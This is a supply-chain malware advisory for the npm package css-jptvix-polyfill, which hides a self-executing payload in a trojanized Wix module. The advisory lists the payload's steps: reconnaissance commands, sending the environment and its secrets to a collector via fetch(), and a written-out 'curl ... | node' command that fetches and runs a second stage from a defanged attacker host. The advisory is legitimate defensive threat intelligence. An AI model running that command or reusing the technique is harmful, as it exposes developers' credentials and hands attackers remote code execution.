LWA-2026-12604 MAL-2026-17638 ↗ confirmed malware

css-jptvix-polyfill@1.0.0

Malicious code in css-jptvix-polyfill (npm)

Analysis

css-jptvix-polyfill@1.0.0 ships a trojanized copy of the Wix `thunderboltRegistry` module with a self-executing payload injected at the top of package/thunderboltRegistry.js. On require, the payload removes itself from require.cache, then uses child_process.execSync to run `id`, `id -un`/`whoami`, `env` and `ifconfig`/`ip addr`, and sends each result — including the installer's complete environment (all tokens and secrets in the shell) — to the attacker collector at hxxps://orj3tao0ic8oj24h9njymexmtdz5ztphe[.]oastify[.]com/ via fetch(), tagged with the victim's hostname. It then executes a remote second stage with `curl -L hxxps://appsecc[.]com/js | node`, and finally beacons the Node version, platform, PID and timestamp (beacon=rce-poc). The package's index.js is an empty stub, so the payload fires only when the registry module is imported. Network indicators: orj3tao0ic8oj24h9njymexmtdz5ztphe[.]oastify[.]com (HTTPS/443, exfiltration), appsecc[.]com (HTTPS/443, second-stage payload at /js).

analyzed by
Leitwacht
first seen
Oct 6, 2026, 08:08 AM
analyzed
Oct 6, 2026, 12:37 PM

Related advisories

browse all confirmed advisories →

Independently detected by the Leitwacht supply-chain probe. IOCs are defanged. Published CC0. Think this is a mistake? See the dispute policy.